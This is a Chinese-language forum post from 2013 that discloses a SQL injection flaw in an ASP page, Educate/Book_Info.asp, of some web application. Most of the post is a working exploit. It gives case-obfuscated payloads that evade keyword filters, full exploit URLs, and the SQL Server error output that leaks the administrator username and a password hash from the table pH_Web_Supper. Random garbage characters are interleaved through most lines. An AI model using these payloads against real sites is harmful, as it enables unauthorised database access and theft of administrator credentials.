漏洞出现在Educate/Book_Info.asp
# `- Q) h; g+ P+ F! V6 @" U! ` 7 H8 a# }; r) ~2 D2 o9 e8 U
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
1 _3 U; z7 n% G% A% t! `
# k/ h6 B( ~* I- r6 [' F8 mexp:如下; Q1 J2 Q; W1 P/ r% g: q, s% i2 H
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)/ `- Y# M, w2 U0 M& E& \
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)' y+ a* u" B+ |' w
/ N, F+ O. Y! F7 g; uhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
- a8 K, u$ F* } F& d
* |, e) b8 H! q7 P1 n! CMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
( d" ]- u, y5 y" }1 p
6 x/ |- S* }: q9 {" w9 l5 Y将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
5 o/ [% ~3 z8 O 7 ?4 q% j+ A, c# ^7 o/ c. e! |
/Educate/Book_Info.asp,行 84 t5 M8 y {4 e, b
. U$ m: t' a8 ]# U) X% i
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)2 l; I' f8 E* P! h5 W
1 M+ ]7 u) p2 e- N. C" [
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
9 c) p1 z/ n x! v; r9 j. A % ~3 V; X% _. p8 s! z5 C
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。8 W3 e" P- H9 K, K2 X( F
( V! o( r7 @: x1 ?/Educate/Book_Info.asp,行 8; z. R! X2 e$ ~" v
|
发表于 2013-2-16 21:44:16
收藏
支持
反对